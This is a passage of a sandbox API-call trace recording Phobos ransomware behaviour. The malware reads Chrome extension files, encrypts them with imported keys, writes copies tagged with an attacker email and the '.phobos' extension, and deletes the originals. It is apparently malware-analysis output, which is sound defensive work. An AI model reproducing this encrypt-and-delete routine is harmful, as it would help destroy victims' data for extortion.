dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0161.678] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0161.678] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0161.679] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32968) returned 1 [0161.679] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0161.679] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x111e1, lpOverlapped=0x0) returned 1 [0162.168] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x111f0, dwBufLen=0x111f0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x111f0) returned 1 [0162.169] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x111f0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x111f0, lpOverlapped=0x0) returned 1 [0162.171] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0162.171] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0162.171] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0162.171] CryptDestroyKey (hKey=0xa32d28) returned 1 [0162.171] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0162.171] CryptDestroyKey (hKey=0xa32968) returned 1 [0162.171] CloseHandle (hObject=0x14c) returned 1 [0162.171] CloseHandle (hObject=0x188) returned 1 [0162.171] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html")) returned 1 [0162.173] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0162.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0162.175] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=6685) returned 1 [0162.175] CloseHandle (hObject=0x188) returned 1 [0162.175] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css")) returned 0x2020 [0162.175] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0162.175] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0162.175] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0162.176] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0162.176] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0162.176] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32968) returned 1 [0162.176] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0162.176] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1a1d, lpOverlapped=0x0) returned 1 [0162.206] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1a20, dwBufLen=0x1a20 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1a20) returned 1 [0162.206] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1a20, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1a20, lpOverlapped=0x0) returned 1 [0162.207] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0162.207] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0162.207] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0162.207] CryptDestroyKey (hKey=0xa32d28) returned 1 [0162.207] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0162.207] CryptDestroyKey (hKey=0xa32968) returned 1 [0162.207] CloseHandle (hObject=0x188) returned 1 [0162.207] CloseHandle (hObject=0x14c) returned 1 [0162.207] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css")) returned 1 [0162.208] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0162.208] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0162.209] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=242) returned 1 [0162.209] CloseHandle (hObject=0x14c) returned 1 [0162.209] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js")) returned 0x2020 [0162.209] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0162.209] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0162.210] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0162.210] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0162.210] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0162.210] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32968) returned 1 [0162.210] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0162.210] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xf2, lpOverlapped=0x0) returned 1 [0162.211] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100, dwBufLen=0x100 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100) returned 1 [0162.211] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x100, lpOverlapped=0x0) returned 1 [0162.212] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0162.212] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0162.212] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0162.212] CryptDestroyKey (hKey=0xa32d28) returned 1 [0162.212] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0162.212] CryptDestroyKey (hKey=0xa32968) returned 1 [0162.212] CloseHandle (hObject=0x14c) returned 1 [0162.212] CloseHandle (hObject=0x188) returned 1 [0162.213] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js")) returned 1 [0162.213] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0162.213] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0162.214] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=7151) returned 1 [0162.214] CloseHandle (hObject=0x188) returned 1 [0162.214] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png")) returned 0x2020 [0162.214] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0162.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0162.214] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0162.214] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0162.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0162.215] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32968) returned 1 [0162.215] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0162.215] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1bef, lpOverlapped=0x0) returned 1 [0162.474] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1bf0, dwBufLen=0x1bf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1bf0) returned 1 [0162.474] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1bf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1bf0, lpOverlapped=0x0) returned 1 [0162.475] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0162.475] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0162.475] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60, dwBufLen=0x60 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60) returned 1 [0162.475] CryptDestroyKey (hKey=0xa327e8) returned 1 [0162.475] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x112, lpOverlapped=0x0) returned 1 [0162.475] CryptDestroyKey (hKey=0xa32968) returned 1 [0162.475] CloseHandle (hObject=0x188) returned 1 [0162.475] CloseHandle (hObject=0x14c) returned 1 [0162.475] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png")) returned 1 [0162.476] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0162.476] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0162.491] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=51320) returned 1 [0162.491] CloseHandle (hObject=0x194) returned 1 [0162.491] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js")) returned 0x2020 [0162.491] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0162.491] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0162.491] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0162.492] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0162.492] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0162.494] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0162.494] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0162.494] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, 